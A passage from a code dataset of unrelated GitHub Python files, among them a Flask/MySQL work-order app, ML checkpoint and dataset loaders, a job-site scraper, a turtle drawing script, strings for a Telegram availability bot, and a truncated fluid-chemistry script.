WorkOrders \" \n \"LEFT JOIN Machines ON WorkOrders.machineId = Machines.machineId \" \n \"LEFT JOIN Locations ON WorkOrders.locationId = Locations.locationId\")\n cur = mysql.connection.cursor()\n cur.execute(query)\n data = cur.fetchall()\n\n machine_dropdown_query = \"SELECT machineId, serial FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(machine_dropdown_query)\n machine_dropdown_data = cur.fetchall()\n\n location_dropdown_query = \"SELECT locationId, locationName FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(location_dropdown_query)\n location_dropdown_data = cur.fetchall()\n\n # render edit_people page passing our query data and homeworld data to the edit_people template\n return render_template(\"workorders.j2\", data=data, machine_dropdown_data=machine_dropdown_data, location_dropdown_data=location_dropdown_data)\n\n\n# route for delete functionality, deleting a work order from WorkOrders,\n# we want to pass the 'id' value of that work order on button click (see HTML) via the route\n@app.route(\"/delete_workorder/\")\ndef delete_workorder(workOrderId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM WorkOrders WHERE workOrderId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n\n''' ############################################################################################################################\nWORK ORDER DETAILS ROUTES\n############################################################################################################################ '''\n\n# route for work order details page\n@app.route(\"/workorderdetails/\", methods=[\"POST\", \"GET\"])\ndef workorder_details(workOrderId):\n\n if request.method == \"POST\":\n \n if request.form.get(\"Update_Work_Order\"):\n # grab user form inputs\n machineId = request.form[\"serial\"]\n locationId = request.form[\"locationId\"]\n date = request.form[\"date\"]\n description = request.form[\"description\"]\n\n # account for null locationId\n if locationId == \"0\":\n # mySQL query to insert a new work order into WorkOrders with our form inputs\n # query = \"INSERT INTO WorkOrders (machineId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s)\" \n query = \"UPDATE WorkOrders SET machineId = %s, date = %s, description = %s WHERE workOrderId = %s;\" \n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, date, description, workOrderId))\n mysql.connection.commit()\n\n # no null inputs\n else:\n # query = \"INSERT INTO WorkOrders (machineId, locationId, date, description) VALUES ((SELECT machineId FROM Machines WHERE serial = %s), %s, %s, %s)\"\n query = \"UPDATE WorkOrders SET machineId = %s, locationId = %s, date = %s, description = %s WHERE workOrderId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (machineId, locationId, date, description, workOrderId))\n mysql.connection.commit()\n\n # redirect to work order details page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n if request.form.get(\"Add_Product\"):\n\n productId = request.form[\"reference\"]\n add_product_query = \"INSERT INTO WorkOrderProducts (workOrderId, productId) VALUES (%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(add_product_query, (workOrderId, productId,))\n mysql.connection.commit()\n\n # redirect to work order details page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n if request.form.get(\"Add_Mechanic\"):\n \n mechanicId = request.form[\"email\"]\n add_mechanic_query = \"INSERT INTO WorkOrderMechanics (workOrderId, mechanicId) VALUES (%s, %s);\"\n cur = mysql.connection.cursor()\n cur.execute(add_mechanic_query, (workOrderId, mechanicId))\n mysql.connection.commit()\n\n # redirect back to work order mechanic page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n # Grab workOrderProducts data so we send it to our template to display\n if request.method == \"GET\":\n\n # work orders queries\n workorder_query = (\"SELECT WorkOrders.workOrderId,\" \n \"Machines.model AS 'Machine Model', Machines.serial AS 'Machine Serial', Locations.locationName AS 'Location Name', WorkOrders.date AS 'Date', WorkOrders.description AS 'Description'\"\n \"FROM WorkOrders \" \n \"LEFT JOIN Machines ON WorkOrders.machineId = Machines.machineId \" \n \"LEFT JOIN Locations ON WorkOrders.locationId = Locations.locationId \"\n \"WHERE WorkOrders.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(workorder_query, (workOrderId,))\n workorder_data = cur.fetchall()\n\n # queries for work order update form\n machine_dropdown_query = \"SELECT machineId, serial FROM Machines;\"\n cur = mysql.connection.cursor()\n cur.execute(machine_dropdown_query)\n machine_dropdown_data = cur.fetchall()\n\n location_dropdown_query = \"SELECT locationId, locationName FROM Locations;\"\n cur = mysql.connection.cursor()\n cur.execute(location_dropdown_query)\n location_dropdown_data = cur.fetchall()\n\n # products queries\n products_query = (\"SELECT WorkOrderProducts.workOrderProductId, Products.productId, Products.productName AS 'Product Name', Products.reference AS 'Product Reference' \"\n \"FROM WorkOrderProducts \"\n \"JOIN Products ON WorkOrderProducts.productId = Products.productId \"\n \"WHERE WorkOrderProducts.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(products_query, (workOrderId,))\n products_data = cur.fetchall()\n\n products_dropdown_query = \"SELECT productId, reference FROM Products;\"\n cur = mysql.connection.cursor()\n cur.execute(products_dropdown_query)\n products_drp_dwn = cur.fetchall()\n\n # check if there are any records in the workorderproducts intersection table for this work order\n products_message = None\n\n if not products_data:\n products_message = \"There are no products assigned to this work order yet.\"\n \n # mechanics queries\n # mySQL query to grab all the work order mechanics in the work Order\n mechanics_query = (\"SELECT WorkOrderMechanics.workOrderMechanicId, Mechanics.firstName AS 'First Name', Mechanics.lastName AS 'Last Name' FROM WorkOrderMechanics\\\n JOIN Mechanics ON WorkOrderMechanics.mechanicId = Mechanics.mechanicId\\\n WHERE WorkOrderMechanics.workOrderId = %s;\")\n cur = mysql.connection.cursor()\n cur.execute(mechanics_query, (workOrderId,))\n mechanics_data = cur.fetchall()\n\n mechanics_dropdown_query = (\"SELECT Mechanics.* \"\n \"FROM Mechanics \"\n \"LEFT JOIN WorkOrderMechanics ON Mechanics.mechanicId = WorkOrderMechanics.mechanicId \"\n \"AND WorkOrderMechanics.workOrderId = %s \"\n \"WHERE WorkOrderMechanics.workOrderId IS NULL;\")\n cur = mysql.connection.cursor()\n cur.execute(mechanics_dropdown_query, (workOrderId,))\n mechanics_drp_dwn = cur.fetchall()\n\n # check if there are any records in the workordermechanics intersection table for this work order\n mechanics_message = None\n if not mechanics_data:\n mechanics_message = \"There are no mechanics assigned to this work order yet.\"\n\n # render work order products page passing our query data to the template\n # workOrderId is passed to the template so it is defined in the action for the form\n return render_template(\"workorder_details.j2\", workorder_data=workorder_data, workOrderId=workOrderId,\n machine_dropdown_data=machine_dropdown_data, location_dropdown_data=location_dropdown_data,\n products_data=products_data, products_message=products_message, products_drp_dwn=products_drp_dwn,\n mechanics_data=mechanics_data, mechanics_message=mechanics_message, mechanics_drp_dwn=mechanics_drp_dwn\n )\n\n\n@app.route(\"/workorderdetails/delete_workorder/\")\ndef delete_workorder_details(workOrderId):\n # mySQL query to delete the person with our passed id\n query = \"DELETE FROM WorkOrders WHERE workOrderId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderId,))\n mysql.connection.commit()\n\n # redirect back to people page\n return redirect(\"/workorders\")\n\n\n# route for delete functionality, deleting a product from a work order,\n# we want to pass the 'workOrderProductId' value of that product on button click (see HTML) via the route\n@app.route(\"/productdetails/delete_product/\")\ndef delete_product_from_work_order(workOrderProductId):\n # mySQL query to delete the product with our passed id\n query = \"DELETE FROM WorkOrderProducts WHERE workOrderProductId = '%s';\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderProductId,))\n mysql.connection.commit()\n\n # redirect to current page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n# route for delete functionality, deleting a mechanic from a work order,\n# we want to pass the 'workOrderMechanicId' value of that mechanic on button click (see HTML) via the route\n@app.route(\"/mechanicdetails/delete_mechanics/\") \ndef delete_workorderMechanics(workOrderMechanicId ):\n # mySQL query to delete the mechanic with our passed id\n query = \"DELETE FROM WorkOrderMechanics WHERE workOrderMechanicId = %s;\"\n cur = mysql.connection.cursor()\n cur.execute(query, (workOrderMechanicId,))\n mysql.connection.commit()\n\n # redirect to current page\n current_url = request.referrer or url_for('index')\n return redirect(current_url)\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return render_template('500.html'), 500\n\n\n# Listener\n# change the port number if deploying on the flip servers\nif __name__ == \"__main__\":\n app.run(port=11238, debug=True)\n\n","repo_name":"juanpabloduqueo/github-helloearth","sub_path":"hello_earth_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":31623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28242239413","text":"from __future__ import division, absolute_import, print_function\n\nimport os\n\nimport torch\n\nimport eval\nimport aoanet.misc.utils as misc_utils\nimport aoanet.eval_utils as eval_utils\n\n\ndef save_checkpoint(model, infos, optimizer, opt, histories=None, append=''):\n if len(append) > 0:\n append = '-' + append\n # if checkpoint_path doesn't exist\n if not os.path.isdir(opt.checkpoint_path):\n os.makedirs(opt.checkpoint_path)\n checkpoint_path = os.path.join(opt.checkpoint_path, 'model%s.pth' % append)\n torch.save(model.state_dict(), checkpoint_path)\n print(\"model saved to {}\".format(checkpoint_path))\n optimizer_path = os.path.join(opt.checkpoint_path, 'model_optimizer%s.pth' % append)\n torch.save(optimizer.state_dict(), optimizer_path)\n with open(os.path.join(opt.checkpoint_path, 'infos_' + opt.id + '%s.pkl' % append), 'wb') as f:\n misc_utils.pickle_dump(infos, f)\n if histories:\n with open(os.path.join(opt.checkpoint_path, 'histories_' + opt.id + '%s.pkl' % append), 'wb') as f:\n misc_utils.pickle_dump(histories, f)\n\n\ndef load_record(opt):\n # open old infos and check if models are compatible\n with open(os.path.join(opt.start_from, 'infos_' + opt.id + '.pkl'), 'rb') as f:\n infos = misc_utils.pickle_load(f)\n saved_model_opt = infos['opt']\n need_be_same = [\"caption_model\", \"rnn_type\", \"rnn_size\", \"num_layers\"]\n for checkme in need_be_same:\n assert vars(saved_model_opt)[checkme] == vars(opt)[checkme], \\\n \"Command line argument and saved model disagree on '%s' \" % checkme\n\n if os.path.isfile(os.path.join(opt.start_from, 'histories_' + opt.id + '.pkl')):\n with open(os.path.join(opt.start_from, 'histories_' + opt.id + '.pkl'), 'rb') as f:\n histories = misc_utils.pickle_load(f)\n return infos, histories\n\n\ndef load_model(model, opt):\n # check if all necessary files exist\n assert os.path.isdir(opt.start_from), \" %s must be a a path\" % opt.start_from\n assert os.path.isfile(os.path.join(opt.start_from, \"infos_\" + opt.id + \".pkl\")), \\\n \"infos.pkl file does not exist in path %s\" % opt.start_from\n model.load_state_dict(torch.load(os.path.join(opt.start_from, 'model.pth')))\n\n\ndef load_optimizer(optimizer, opt):\n optimizer.load_state_dict(torch.load(os.path.join(opt.start_from, 'model_optimizer.pth')))\n\n\n@torch.no_grad()\ndef checkpoint(\n model, optimizer, crit, loader,\n eval_kwargs, histories, infos, opt,\n iteration, best_val_score,\n logger\n):\n # val_loss, predictions, lang_stats = eval_utils.eval_split(\n # model.decoder, crit, loader, eval_kwargs)\n val_loss, predictions, lang_stats = eval.evaluate(model, crit, loader, eval_kwargs)\n\n # Write validation result into summary\n logger.val_log('validation_loss', val_loss, iteration)\n if lang_stats is not None:\n for k, v in lang_stats.items():\n logger.val_log(k, v, iteration)\n histories['val_result_history'][iteration] = {\n 'loss': val_loss, 'lang_stats': lang_stats, 'predictions': predictions\n }\n\n # Save model if improving on validation result\n if opt.language_eval == 1:\n current_score = lang_stats['CIDEr']\n else:\n current_score = - val_loss\n\n best_flag = False\n if best_val_score is None or current_score > best_val_score:\n best_val_score = current_score\n best_flag = True\n # Dump miscalleous information\n infos['best_val_score'] = best_val_score\n\n save_checkpoint(model, infos, optimizer, opt, histories)\n if opt.save_history_ckpt:\n save_checkpoint(model, infos, optimizer, opt, append=str(iteration))\n if best_flag:\n save_checkpoint(model, infos, optimizer, opt, append='best')\n\n return best_val_score\n","repo_name":"GjQAQ/RobustImageCaptioning","sub_path":"utils/checkpoint.py","file_name":"checkpoint.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28349554265","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\ndata format:\n\nuser\titem\trating\ttimestamp\n1\t1193\t5\t978300760\n1\t661\t3\t978302109\n1\t914\t3\t978301968\n1\t3408\t4\t978300275\n1\t2355\t5\t97882429\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport os\nimport sys\n\nimport pandas as pd\nfrom six.moves import input\n\nfrom . import download_builtin_dataset, BUILTIN_DATASETS\nfrom ..features.feature_dict import FeatureDict, process_features\n\n\nclass Movielens:\n \"\"\"`Movielens `_ Dataset.\n\n If the dataset has not already been loaded, it will be downloaded and saved.\n\n Args:\n name(:obj:`string`): The name of the built-in dataset to load.\n Accepted values are 'ml-100k.zip', 'ml-1m.zip', and 'jester_dataset_2.zip'.\n Default is 'ml-100k.zip'.\n prompt(:obj:`bool`): Prompt before downloading if dataset is not\n already on disk.\n Default is True.\n\n Returns:\n A :obj:`Dataset` object.\n\n Raises:\n ValueError: If the ``name`` parameter is incorrect.\n\n \"\"\"\n\n def __init__(self, name='ml-100k.zip', prompt=True, shuffle=True, n_samples=-1):\n self.name = name\n self.shuffle = shuffle\n self.n_samples = n_samples\n\n try:\n dataset = BUILTIN_DATASETS[name]\n except KeyError:\n raise ValueError('unknown dataset ' + name +\n '. Accepted values are ' +\n ', '.join(BUILTIN_DATASETS.keys()) + '.')\n\n # if dataset does not exist, offer to download it\n if not os.path.isfile(dataset.path):\n answered = not prompt\n while not answered:\n print('Dataset ' + name + ' could not be found. Do you want '\n 'to download it? [Y/n] ', end='')\n choice = input().lower()\n\n if choice in ['yes', 'y', '', 'ok', 'true']:\n answered = True\n elif choice in ['no', 'n', 'false']:\n print(\"Ok then, I'm out!\")\n sys.exit()\n\n download_builtin_dataset(name)\n\n self.line_format, self.sep = dataset.reader_params\n splitted_format = self.line_format.split()\n\n self.columns = ['user', 'item', 'rating']\n if 'timestamp' in splitted_format:\n self.with_timestamp = True\n self.columns.append('timestamp')\n else:\n self.with_timestamp = False\n\n # check that all fields are correct\n if any(field not in self.columns for field in splitted_format):\n raise ValueError('line_format parameter is incorrect.')\n\n self.data_file = dataset.path\n self.data = self.read_data(dataset.path)\n\n def read_data(self, file_name):\n \"\"\"Return a list of ratings (user, item, rating, timestamp) read from file_name\"\"\"\n file_path = os.path.expanduser(file_name)\n data = pd.read_csv(file_path, delimiter=self.sep, header=None)\n data.columns = self.columns\n\n # Sample data\n if self.n_samples > 0:\n data = data.sample(n=self.n_samples)\n data.reset_index(drop=True, inplace=True)\n elif self.shuffle:\n data = data.sample(frac=1)\n data.reset_index(drop=True, inplace=True)\n\n # Add cols\n data[self.columns] = data[self.columns].fillna(0)\n return data\n\n def get_features(self, binarize=True):\n \"\"\"\n Get feature dict\n :param binarize: bool\n :return: features, X_idx, X_value, y, category_index, continuous_value\n \"\"\"\n # build feature instance\n features = FeatureDict()\n for column in ['user', 'item']:\n features.add_categorical_feat(column)\n\n X_idx, X_value, category_index, continuous_value = process_features(features, self.data)\n y = self.data.rating\n if binarize:\n def transform_y(label):\n if label > 3:\n return 1\n else:\n return 0\n\n y = y.apply(transform_y)\n return features, X_idx, X_value, y, category_index, continuous_value\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' name: {}\\n'.format(self.name)\n fmt_str += ' data size: {}\\n'.format(len(self.data))\n fmt_str += ' shuffle: {}\\n'.format(self.shuffle)\n fmt_str += ' data file: {}\\n'.format(self.data_file)\n fmt_str += ' line format: {}\\n'.format(self.line_format)\n fmt_str += ' data head: {}\\n'.format(self.data.head(n=1))\n return fmt_str\n","repo_name":"shibing624/rater","sub_path":"rater/datasets/movielens.py","file_name":"movielens.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"77"} +{"seq_id":"35212863245","text":"import os\r\nimport random\r\n\r\nimport numpy as np\r\nimport torch\r\n\r\n\r\ndef get_successors(dataset, nb_nodes):\r\n successor = {}\r\n perm = []\r\n for node1, node2 in dataset:\r\n if node1 not in successor.keys():\r\n successor[node1] = [node2]\r\n else:\r\n successor[node1] += [node2]\r\n perm.append(node1 * nb_nodes + node2)\r\n return successor, perm\r\n\r\n\r\ndef remap(nodeids_npy1, nodeids_npy2):\r\n all_nodeids = np.unique(np.concatenate([nodeids_npy1, nodeids_npy2]))\r\n nb_nodes = all_nodeids.shape[0]\r\n print('>> number of nodes:{}'.format(nb_nodes))\r\n dicts = {}\r\n for ix, nodeid in enumerate(np.unique(all_nodeids)):\r\n dicts[nodeid] = ix\r\n remaped_nodeid1 = np.array(list(map(dicts.get, nodeids_npy1.flatten()))).reshape(nodeids_npy1.shape)\r\n remaped_nodeid2 = np.array(list(map(dicts.get, nodeids_npy2.flatten()))).reshape(nodeids_npy2.shape)\r\n return remaped_nodeid1, remaped_nodeid2, nb_nodes\r\n\r\n\r\ndef load1(dataset):\r\n dir = '../node_embedding/dataset/processed/'\r\n print('===' * 20)\r\n print('>> dataset is {}'.format(dataset))\r\n train_file = dir + '{}/{}_train.txt'.format(dataset, dataset)\r\n test_file = dir + '{}/{}_test.txt'.format(dataset, dataset)\r\n train_npy = np.loadtxt(train_file, delimiter=' ', dtype=np.int)\r\n test_npy = np.loadtxt(test_file, delimiter=' ', dtype=np.int)\r\n train_npy, test_npy, nb_nodes = remap(train_npy, test_npy)\r\n\r\n successors1 = get_successors(train_npy, nb_nodes)\r\n successors2 = get_successors(test_npy, nb_nodes)\r\n\r\n train_data = torch.from_numpy(train_npy).transpose(0, 1)\r\n test_data = torch.from_numpy(test_npy).transpose(0, 1)\r\n\r\n return train_data, test_data, nb_nodes, successors1, successors2\r\n\r\n\r\ndef hidden_edges(edge_index, nb_nodes, dataset):\r\n cache_path = './data/processed/{}/{}.processed.pt'.format(dataset, dataset)\r\n adj = np.zeros([nb_nodes, nb_nodes])\r\n adj[edge_index[0], edge_index[1]] = 1\r\n h_out = []\r\n h_in = []\r\n for i in range(adj.shape[0]):\r\n node_out = np.where(adj[i, :] != 0)[0]\r\n node_in = np.where(adj[:, i] != 0)[0]\r\n if len(node_out) != 0:\r\n r_node_out = random.choice(node_out)\r\n h_out.append((i, r_node_out))\r\n if len(node_in) != 0:\r\n r_node_in = random.choice(node_in)\r\n h_in.append((r_node_in, i))\r\n hidden_ = list(set(h_out).union(set(h_in)))\r\n k1 = k2 = 0\r\n # 统计没有out link的node, adj, adj.T\r\n for i in adj:\r\n if i.max() == 0:\r\n k1 += 1\r\n for j in adj.T:\r\n if j.max() == 0:\r\n k2 += 1\r\n print('{} {}'.format(k1, k2))\r\n # 把选中的hidden从edge_index中隐藏\r\n hidden_perm = np.array([a[0] * nb_nodes + a[1] for a in hidden_])\r\n all_perm = edge_index[0] * nb_nodes + edge_index[1]\r\n train_perm = np.setdiff1d(all_perm, hidden_perm)\r\n print('number of train links:{}'.format(train_perm.shape[0]))\r\n print('number of test links:{}'.format(hidden_perm.shape[0]))\r\n print('number of all links:{}'.format(all_perm.shape[0]))\r\n # saved\r\n torch.save((train_perm, h_in, h_out, nb_nodes), cache_path)\r\n print('>> saved!')\r\n mask1 = train_perm // nb_nodes\r\n mask2 = train_perm % nb_nodes\r\n adj[mask1, mask2] = 0\r\n return train_perm, h_in, h_out, nb_nodes\r\n\r\n\r\ndef load_feat(raw_file, node_index):\r\n import pandas as pd\r\n node_index_list = []\r\n for key, value in node_index.items():\r\n node_index_list.append([key, value])\r\n df_node_index = pd.DataFrame(node_index_list, columns=['id', 'index'])\r\n f = open(raw_file, 'r')\r\n feat = []\r\n for line in f.readlines():\r\n line_ = line.strip('\\n').split('\\t')[:-1]\r\n feat.append(line_)\r\n df_feat = pd.DataFrame(feat)\r\n df_feat = df_feat.rename(columns={0: 'id'})\r\n df = pd.merge(df_node_index, df_feat, how='left', on='id')\r\n df.sort_values(by='index', ascending=True, inplace=True)\r\n df_feat_reindex = df.drop(['id', 'index'], axis=1)\r\n np_feat = df_feat_reindex.astype(np.float64).to_numpy()\r\n return np_feat\r\n\r\n\r\ndef load(dataset):\r\n dir = './data/raw/'\r\n print('===' * 20)\r\n print('>> dataset is {}'.format(dataset))\r\n raw_file = dir + '{}/{}.cites'.format(dataset, dataset)\r\n raw_feat_file = dir + '{}/{}.content'.format(dataset, dataset)\r\n processed_file = './data/processed/{}/{}.processed.pt'.format(dataset, dataset)\r\n edge_list = []\r\n if os.path.isfile(processed_file):\r\n train_perm, h_in, h_out, nb_nodes = torch.load(processed_file)\r\n print('>> number of nodes: {}'.format(nb_nodes))\r\n else:\r\n with open(raw_file, 'r') as f:\r\n node_index = {}\r\n ix = 0\r\n for line in f.readlines():\r\n src, dst = line.strip('\\n').split('\\t')[:2]\r\n if src not in node_index.keys():\r\n node_index[src] = ix\r\n ix += 1\r\n if dst not in node_index.keys():\r\n node_index[dst] = ix\r\n ix += 1\r\n edge_list.append([node_index[dst], node_index[src]])\r\n nb_nodes = len(node_index)\r\n nb_links = len(edge_list)\r\n print('>> number of nodes: {}'.format(nb_nodes))\r\n print('>> number of links: {}'.format(nb_links))\r\n edge_index = np.transpose(np.array(edge_list))\r\n train_perm, h_in, h_out, nb_nodes = hidden_edges(edge_index, nb_nodes, dataset)\r\n feat = load_feat(raw_feat_file, node_index)\r\n return train_perm, h_in, h_out, nb_nodes, feat\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = 'cora'\r\n dataset = 'citeseer'\r\n load(dataset)\r\n\r\n","repo_name":"ziqiaomeng/directed-graph","sub_path":"directed-graph-pyg/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73561953849","text":"import urllib.request\r\nimport urllib.parse\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nclass ZhilianSpider(object):\r\n url = 'https://sou.zhaopin.com/?'\r\n\r\n def __init__(self, city, kw, sp, ep):\r\n # 将上面的参数都保存为自己的成员属性\r\n self.jl = city\r\n self.kw = kw\r\n self.sp = sp\r\n self.ep = ep\r\n pass\r\n\r\n def handle_request(self, page): # 根据信息生成访问的url,并构建请求\r\n query_string = {\r\n 'p': page,\r\n 'jl': self.jl,\r\n 'kw': self.kw,\r\n }\r\n string = urllib.parse.urlencode(query_string)\r\n final_url = self.url + string\r\n # print(final_url)\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'\r\n }\r\n request = urllib.request.Request(url=final_url, headers=headers)\r\n return request\r\n\r\n def parse(self, content): # 解析内容\r\n # soup = BeautifulSoup(content, 'lxml') # 生成对象\r\n # 思路;先找到所有“div class=\"contentpile__content__wrapper__item clearfix\"”,一个工作岗位就是一个这个玩意儿,然后通过这个对象的find、select方法去寻找没一条记录里的信息\r\n # div_list = soup.select('.contentpile')\r\n soup = BeautifulSoup(open('zhilian_test.html'), 'lxml')\r\n div_list = soup.select('#listContent > .contentpile__content__wrapper clearfix')\r\n print(div_list)\r\n print(len(div_list))\r\n\r\n def run(self): # 总程序\r\n for page in range(self.sp, self.ep+1):\r\n request = self.handle_request(page)\r\n content = urllib.request.urlopen(request).read().decode()\r\n # print(content)\r\n # 解析内容\r\n self.parse(content)\r\n\r\n\r\ndef main():\r\n city = input('请输入您想查询的城市:')\r\n kw = input('请输入工作关键字:')\r\n sp = int(input('请输入起始页码:'))\r\n ep = int(input('请输入结束页码:'))\r\n # ��建对象,启动爬取程序\r\n spider = ZhilianSpider(city, kw, sp, ep)\r\n spider.run()\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"kevinhkr/Cra","sub_path":"41_zhilian.py","file_name":"41_zhilian.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27440334269","text":"# draw a red circle\r\n# By bichicode\r\n\r\nimport turtle\r\nfrom turtle import bye\r\n\r\n\r\nturtle.penup()\r\n\r\n# I don't like the cursor\r\nturtle.hideturtle()\r\n\r\n# Set position\r\nturtle.goto(0, -75)\r\n\r\n# draw the circle\r\nturtle.pendown()\r\n\r\nturtle.pencolor(\"red\")\r\n\r\n# color the circle\r\nturtle.fillcolor('red')\r\n\r\nturtle.begin_fill()\r\n\r\nturtle.circle(150, 360)\r\n\r\nturtle.end_fill()\r\n\r\nturtle.penup()\r\n\r\n# My name\r\nturtle.goto(0, -160)\r\n\r\nturtle.pendown()\r\n\r\nturtle.color('purple')\r\n\r\nstyle = ('Courier', 20, 'italic')\r\n\r\nturtle.write('Bichicode', font=style, align='center')\r\n\r\n# Close with enter\r\nturtle.onkeypress(bye, '\\r')\r\n\r\nturtle.listen()\r\n\r\nturtle.done()\r\n","repo_name":"bichicode/ExtraProyects","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69824683130","text":"class Texts:\n start = \"Привет! Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\\nЧтобы получать уведомления, нажми кнопку ниже. Напиши /help для списка команд.\"\n start_subscribed = \"Привет! Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\\nВы уже подписаны на уведомления. Чтобы отписаться, нажми кнопку ниже. Напиши /help для списка команд.\"\n help = \"Я бот, который уведомляет об открытии продаж на сайте aeza.net. \\nЧтобы получать уведомления, введи команду \\\n/start. \\n/status для получения текущего статуса.\\nВеб-страница мониторинга https://aeza-monitor.cofob.dev/status/locations\\\n\\n\\nБота написал @cofob на Python и aiogram, исходники \\\n- https://github.com/cofob/aeza-assistant\"\n pm_for_command = \"Напиши в ЛС с этой командой, в чатах она отключена.\"\n no_rights = \"Недостаточно прав для выполнения этой команды.\"\n subscribe = \"Получать уведомления\"\n subscribed = \"Вы подписались на уведомления!\"\n unsubscribe = \"Отписаться\"\n unsubscribed = \"Вы отписались от уведомлений.\"\n available = \"🟢 {}\"\n unavailable = \"🔴 {}\"\n current_status = \"Доступные для аренды локации:\\n{}\"\n state_changed = \"Список доступных для аренды локаций изменился!\\n{}\"\n added_to_chat = \"Привет, я добавлен в этот чат! Напиши /help@{username} для получения списка команд. Можешь нажать \\\nкнопку ниже, чтобы получать уведомления об открытии продаж на сайте aeza.net.\"\n bot_is_loading = \"Бот еще загружается, попробуйте позже.\"\n","repo_name":"cofob/aeza-assistant","sub_path":"aeza_assistant/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"ru","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"791461912","text":"vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\nword = input(\"英単語を入力してください。母音を探します:\")\n\nfound = []\n\nfor letter in word:\n if letter in vowels:\n if letter not in found:\n found.append(letter)\n\nprint(*found, sep=\"\\n\")\n","repo_name":"TakutoHashimoto/head_first_python","sub_path":"chap3/vowels3.py","file_name":"vowels3.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31565710131","text":"# -*- coding: utf-8 -*-\n# Author: Yiping Liu\n# Description: This script calculates the average of a list of numbers.\n# Version: 1.0\n# Last Modified: May 7, 2023\n\nimport sys\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(SCRIPT_DIR))\n\nfrom Pitzer.models import FluidPitzer\nimport pandas as pd\n\n\n# columns = [\n# 'T',\n# 'Na+',\n# 'Ca+2',\n# # 'K+',\n# # 'Li+',\n# # 'Mg+2',\n# # 'Sr+2',\n# # 'Cs+',\n# # 'Rb+',\n# 'Mn+2',\n# 'Zn+2',\n# 'Pb+2'\n# ]\n# df = pd.DataFrame(columns=columns)\n#\n# def replace_blanks_with_commas(input_string):\n# # replace blank spaces with commas in each row and convert to tuple of floats (or strings)\n# rows = input_string.strip().split('\\n')\n# replaced_rows = []\n# for row in rows:\n# row_as_list = []\n# for num in row.split():\n# try:\n# row_as_list.append(float(num))\n# except ValueError:\n# row_as_list.append(num)\n# row_as_tuple = tuple(row_as_list)\n# replaced_rows.append(row_as_tuple)\n#\n# # output as list of tuples\n# output = replaced_rows\n#\n# return output\n#\n#\n# data = \"\"\"\n# -21.90364364\t1\t0.261712115\t0.002102761\t0.002044225\t0.000300444\n# \"\"\"\n# data = replace_blanks_with_commas(data)\n#\n#\n#\n# for dt in data:\n# print(dt)\n# species = {\n# 'Na+': dt[1],\n# 'Ca+2': dt[2],\n# # 'K+': dt[3],\n# # 'Li+': dt[4],\n# # 'Mg+2': dt[5],\n# # 'Sr+2': dt[6],\n# # 'Cs+': dt[7],\n# # 'Rb+': dt[8],\n# 'Mn+2': dt[3],\n# 'Zn+2': dt[4],\n# 'Pb+2': dt[5]\n# }\n# fluid = FluidPitzer(\n# x0=(3, 5),\n# species=species,\n# t=dt[0],\n# solids=['H2O(S)']\n# )\n# print(fluid.solids)\n# result = fluid.optimize()\n# if result.success:\n# for key, value in species.items():\n# species[key] = value * result.x[0]\n#\n# values_list = list(species.values())\n#\n# # create a new DataFrame with the current row data and concatenate it with the existing DataFrame\n# row_data = [dt[0]] + values_list\n# row_df = pd.DataFrame([row_data], columns=columns)\n# df = pd.concat([df, row_df], ignore_index=True)\n#\n# print(df)\n#\n# # write the DataFrame to a CSV file\n# 